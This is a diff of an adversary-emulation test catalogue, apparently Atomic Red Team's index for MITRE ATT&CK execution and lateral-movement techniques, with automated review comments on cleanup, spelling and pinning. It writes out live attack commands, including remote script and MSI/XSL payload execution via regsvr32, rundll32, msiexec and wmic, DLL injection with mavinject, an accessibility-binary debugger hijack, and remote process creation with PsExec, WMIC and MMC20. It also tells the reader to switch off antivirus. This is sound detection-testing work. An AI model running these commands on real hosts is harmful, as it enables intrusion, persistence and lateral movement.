|
|
|
|
description: |
|
|
|
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
|
|
|
|
|
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23540,12 +23600,12 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Regsvr32 local DLL execution
|
|
|
|
|
description: 'Regsvr32.exe is a command-line program used to register and unregister
|
|
|
|
|
OLE controls
|
|
|
|
|
OLE controls. Upon execution, calc.exe will be launched.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23567,7 +23627,7 @@ execution:
|
|
|
|
|
command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
|
|
|
|
|
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1085:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -23628,9 +23688,10 @@ execution:
|
|
|
|
|
identifier: T1085
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Rundll32 execute JavaScript Remote Payload With GetObject
|
|
|
|
|
description: 'Test execution of a remote script using rundll32.exe
|
|
|
|
|
description: 'Test execution of a remote script using rundll32.exe. Upon execution
|
|
|
|
|
notepad.exe will be opened.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -23643,7 +23704,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 execute VBscript command
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
|
|
|
|
@@ -23661,7 +23722,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 advpack.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with advpack.dll.
|
|
|
|
@@ -23686,7 +23747,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 ieadvpack.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with ieadvpack.dll.
|
|
|
|
@@ -23711,7 +23772,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 syssetup.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with syssetup.dll.
|
|
|
|
@@ -23737,7 +23798,7 @@ execution:
|
|
|
|
|
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
|
|
|
|
|
128 .\#{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Rundll32 setupapi.dll Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a command using rundll32.exe with setupapi.dll.
|
|
|
|
@@ -23763,7 +23824,7 @@ execution:
|
|
|
|
|
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
|
|
|
|
|
.\#{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1053:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -23868,7 +23929,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'at 13:20 /interactive cmd
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Local
|
|
|
|
|
description: "Upon successful execution, cmd.exe will create a scheduled task
|
|
|
|
|
to spawn cmd.exe at 20:10. \n"
|
|
|
|
@@ -23888,10 +23949,10 @@ execution:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Scheduled task Remote
|
|
|
|
|
description: "Create a task on a remote system.\n\nUpon successful execution,
|
|
|
|
|
cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote
|
|
|
|
@@ -23925,10 +23986,10 @@ execution:
|
|
|
|
|
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
|
|
|
|
|
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell Cmdlet Scheduled Task
|
|
|
|
|
description: "Create an atomic scheduled task that leverages native powershell
|
|
|
|
|
cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled
|
|
|
|
@@ -23948,7 +24009,7 @@ execution:
|
|
|
|
|
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
|
|
|
|
|
>$null 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1064:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -24017,7 +24078,7 @@ execution:
|
|
|
|
|
- name: Create and Execute Bash Shell Script
|
|
|
|
|
description: 'Creates and executes a simple bash script.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -24032,7 +24093,7 @@ execution:
|
|
|
|
|
- name: Create and Execute Batch Script
|
|
|
|
|
description: 'Creates and executes a simple batch script.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24052,7 +24113,7 @@ execution:
|
|
|
|
|
\n"
|
|
|
|
|
cleanup_command: 'del #{script_to_create} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1035:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24139,7 +24200,7 @@ execution:
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: PsExec tool from Sysinternals must exist on disk at specified
|
|
|
|
|
location (#{psexec_exe})
|
|
|
|
|
prereq_command: if (Test-Path "#{psexec_exe}"") { exit 0} else { exit 1}
|
|
|
|
|
prereq_command: if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
|
|
|
|
|
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
|
|
|
|
@@ -24150,7 +24211,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: '#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1218:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24264,7 +24325,7 @@ execution:
|
|
|
|
|
description: 'Injects arbitrary DLL into running process specified by process
|
|
|
|
|
ID. Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24288,12 +24349,12 @@ execution:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
|
|
|
|
|
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
|
|
|
|
|
Requires Windows 10.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24305,12 +24366,12 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Register-CimProvider - Execute evil dll
|
|
|
|
|
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
|
|
|
|
|
note this dll can be served up via SMB
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24329,12 +24390,12 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Local MSI file
|
|
|
|
|
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
|
|
|
|
|
The MSI opens notepad.exe when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24351,13 +24412,13 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /q /i "#{msi_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Remote MSI file
|
|
|
|
|
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
|
|
|
|
|
in application installation, commonly seen in malware execution. The MSI opens
|
|
|
|
|
notepad.exe when sucessfully executed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24369,7 +24430,7 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /q /i "#{msi_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Msiexec.exe - Execute Arbitrary DLL
|
|
|
|
|
description: |
|
|
|
|
|
Execute arbitrary DLL file stored locally. Commonly seen in application installation.
|
|
|
|
@@ -24393,11 +24454,11 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'msiexec.exe /y "#{dll_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Odbcconf.exe - Execute Arbitrary DLL
|
|
|
|
|
description: 'Execute arbitrary DLL file stored locally.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24416,7 +24477,7 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: InfDefaultInstall.exe .inf Execution
|
|
|
|
|
description: |
|
|
|
|
|
Test execution of a .inf using InfDefaultInstall.exe
|
|
|
|
@@ -24441,7 +24502,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'InfDefaultInstall.exe #{inf_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1216:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24498,7 +24559,7 @@ execution:
|
|
|
|
|
description: 'Executes the signed PubPrn.vbs script with options to download
|
|
|
|
|
and execute an arbitrary payload.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24512,12 +24573,12 @@ execution:
|
|
|
|
|
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
|
|
|
|
localhost "script:#{remote_payload}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
|
|
|
|
|
description: 'Executes the signed SyncAppvPublishingServer script with options
|
|
|
|
|
to execute an arbitrary PowerShell command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24530,12 +24591,12 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: manage-bde.wsf Signed Script Command Execution
|
|
|
|
|
description: 'Executes the signed manage-bde.wsf script with options to execute
|
|
|
|
|
an arbitrary command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24551,7 +24612,7 @@ execution:
|
|
|
|
|
cscript manage-bde.wsf
|
|
|
|
|
cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1153:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24596,7 +24657,7 @@ execution:
|
|
|
|
|
- name: Execute Script using Source
|
|
|
|
|
description: 'Creates a script and executes it using the source command
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -24610,7 +24671,7 @@ execution:
|
|
|
|
|
description: 'Creates a script and executes it using the source command''s dot
|
|
|
|
|
alias
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -24680,7 +24741,7 @@ execution:
|
|
|
|
|
- name: Space After Filename
|
|
|
|
|
description: 'Space After Filename
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -24887,7 +24948,7 @@ execution:
|
|
|
|
|
- name: MSBuild Bypass Using Inline Tasks
|
|
|
|
|
description: 'Executes the code in a project file using. C# Example
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -24907,7 +24968,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1204:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -24997,7 +25058,7 @@ execution:
|
|
|
|
|
jse_path:
|
|
|
|
|
description: 'Path for the macro to write out the "malicious" .jse file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: String
|
|
|
|
|
default: C:\Users\Public\art.jse
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
@@ -25053,7 +25114,7 @@ execution:
|
|
|
|
|
cleanup_command: 'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
|
|
|
|
|
-Name ''AccessVBOM'' -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: OSTAP JS version
|
|
|
|
|
description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
|
|
|
|
|
\nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
|
|
|
|
@@ -25164,7 +25225,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic useraccount get /ALL /format:csv
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Reconnaissance Processes
|
|
|
|
|
description: |
|
|
|
|
|
An adversary might use WMI to list Processes running on the compromised host.
|
|
|
|
@@ -25176,7 +25237,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic process get caption,executablepath,commandline /format:csv
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Reconnaissance Software
|
|
|
|
|
description: |
|
|
|
|
|
An adversary might use WMI to list installed Software hotfix and patches.
|
|
|
|
@@ -25188,7 +25249,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic qfe get description,installedOn /format:csv
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Reconnaissance List Remote Services
|
|
|
|
|
description: "An adversary might use WMI to check if a certain Remote Service
|
|
|
|
|
is running on a remote device. \nWhen the test completes, a service information
|
|
|
|
@@ -25212,7 +25273,7 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Execute Local Process
|
|
|
|
|
description: |
|
|
|
|
|
This test uses wmic.exe to execute a process on the local host.
|
|
|
|
@@ -25229,10 +25290,10 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic process call create #{process_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMI Execute Remote Process
|
|
|
|
|
description: "This test uses wmic.exe to execute a process on a remote host.
|
|
|
|
|
Specify a valid value for remote IP using the node parameter.\nTo clean up,
|
|
|
|
@@ -25255,11 +25316,11 @@ execution:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'wmic /node:"#{node}" process call create #{process_to_execute}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'wmic /node:"#{node}" process where name=''#{process_to_execute}''
|
|
|
|
|
delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1028:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -25322,8 +25383,10 @@ execution:
|
|
|
|
|
identifier: T1028
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Enable Windows Remote Management
|
|
|
|
|
description: "Powershell Enable WinRM\n\nUpon successful execution, powershell
|
|
|
|
|
will \"Enable-PSRemoting\" allowing for remote PS access. \n"
|
|
|
|
|
description: |
|
|
|
|
|
Powershell Enable WinRM
|
|
|
|
|
|
|
|
|
|
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25331,10 +25394,16 @@ execution:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'Enable-PSRemoting -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell Lateral Movement
|
|
|
|
|
description: "Powershell lateral movement using the mmc20 application com object.\n\nReference:\n\nhttps://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/\n\nUpon
|
|
|
|
|
successful execution, cmd will spawn calc.exe on a remote computer. \n"
|
|
|
|
|
description: |
|
|
|
|
|
Powershell lateral movement using the mmc20 application com object.
|
|
|
|
|
|
|
|
|
|
Reference:
|
|
|
|
|
|
|
|
|
|
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
|
|
|
|
|
|
|
|
|
|
Upon successful execution, cmd will spawn calc.exe on a remote computer.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
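Review bot: No `cleanup_command` is visible for the Enable Windows Remote Management test, so `Enable-PSRemoting -Force` leaves the host with remoting enabled, a WinRM listener and the matching firewall rule after the test ends, which is a lasting configuration change rather than a transient emulation. Suggest adding `cleanup_command: 'Disable-PSRemoting -Force'` under the command and noting in the description that Disable-PSRemoting alone does not stop the WinRM service or remove the listener and firewall exception, so a host that was not remoting-enabled beforehand needs those reverted as well. The identical test under lateral-movement (hunk `@@ -26831,10 +26908,16 @@`) has the same gap.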
|
|
|
|
@@ -25343,11 +25412,11 @@ execution:
|
|
|
|
|
type: string
|
|
|
|
|
default: computer1
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
|
|
|
|
name: powershell
|
|
|
|
|
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
|
|
|
|
$null, $null, "7")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC Process Call Create
|
|
|
|
|
description: |
|
|
|
|
|
Utilize WMIC to start remote process.
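Review bot: The new powershell executor command keeps `.Documnet.ActiveView` from the line it replaces, a spelling that does not match the property name used in the write-up linked from this test's description; if that property does not exist on the COM object the expression resolves to null and the test throws instead of exercising the technique, so any detection validated with it is validated against a no-op. Verify the spelling against the referenced post before merging. The same text is carried into the lateral-movement copy of this test (hunk `@@ -26843,11 +26926,11 @@`).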
|
|
|
|
@@ -25375,7 +25444,7 @@ execution:
|
|
|
|
|
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
|
|
|
|
|
/t REG_SZ /d \"cmd.exe\" /f"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Psexec
|
|
|
|
|
description: |
|
|
|
|
|
Utilize psexec to start remote process.
|
|
|
|
@@ -25433,7 +25502,7 @@ execution:
|
|
|
|
|
name: powershell
|
|
|
|
|
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1220:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -25527,9 +25596,10 @@ execution:
|
|
|
|
|
- name: MSXSL Bypass using local files
|
|
|
|
|
description: 'Executes the code specified within a XSL script tag during XSL
|
|
|
|
|
transformation using a local payload. Requires download of MSXSL from Microsoft
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
|
|
|
|
|
when test sucessfully executed, while AV turned off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
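Review bot: The added description text misspells "successfully" (`when test sucessfully executed`), and the same spelling is added in the remote-files variant (`@@ -25557,13 +25627,14 @@`) and in the WMIC remote XSL test (`@@ -25605,14 +25676,15 @@`). Suggest `Opens Calculator.exe when the test executes successfully`. The trailing "while AV turned off" would also read better as an explicit precondition, e.g. `Requires real-time antivirus protection to be disabled for the payload to run`, so the reader knows it is a test requirement rather than an observation.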
|
|
|
|
@@ -25557,13 +25627,14 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: MSXSL Bypass using remote files
|
|
|
|
|
description: 'Executes the code specified within a XSL script tag during XSL
|
|
|
|
|
transformation using a remote payload. Requires download of MSXSL from Microsoft
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
|
|
|
at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe
|
|
|
|
|
when test sucessfully executed, while AV turned off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -25579,12 +25650,12 @@ execution:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC bypass using local XSL file
|
|
|
|
|
description: 'Executes the code specified within a XSL script using a local
|
|
|
|
|
payload.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -25605,14 +25676,15 @@ execution:
|
|
|
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
|
|
|
|
|
command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC bypass using remote XSL file
|
|
|
|
|
description: 'Executes the code specified within a XSL script using a remote
|
|
|
|
|
payload.
|
|
|
|
|
payload. Open Calculator.exe when test sucessfully executed, while AV turned
|
|
|
|
|
off.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
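Review bot: The get_prereq_command on this hunk's first line fetches wmicscript.xsl from the repository's `master` branch rather than a pinned revision, so the payload that `wmic ... /FORMAT:` executes can change between runs and cannot be tied to the version that was reviewed. Suggest pinning the URL to a commit (placeholder: `.../raw/<COMMIT_SHA>/atomics/T1220/src/wmicscript.xsl`) or comparing the downloaded file against a recorded hash before the test runs. The `remote_xsl_file` default in the following hunk (`@@ -25626,9 +25698,9 @@`) points at `master` in the same way.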
|
|
|
|
@@ -25626,9 +25698,9 @@ execution:
|
|
|
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
|
|
|
|
|
command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
lateral-movement:
|
|
|
|
|
T1155:
|
|
|
|
|
technique:
|
|
|
|
@@ -25698,7 +25770,7 @@ lateral-movement:
|
|
|
|
|
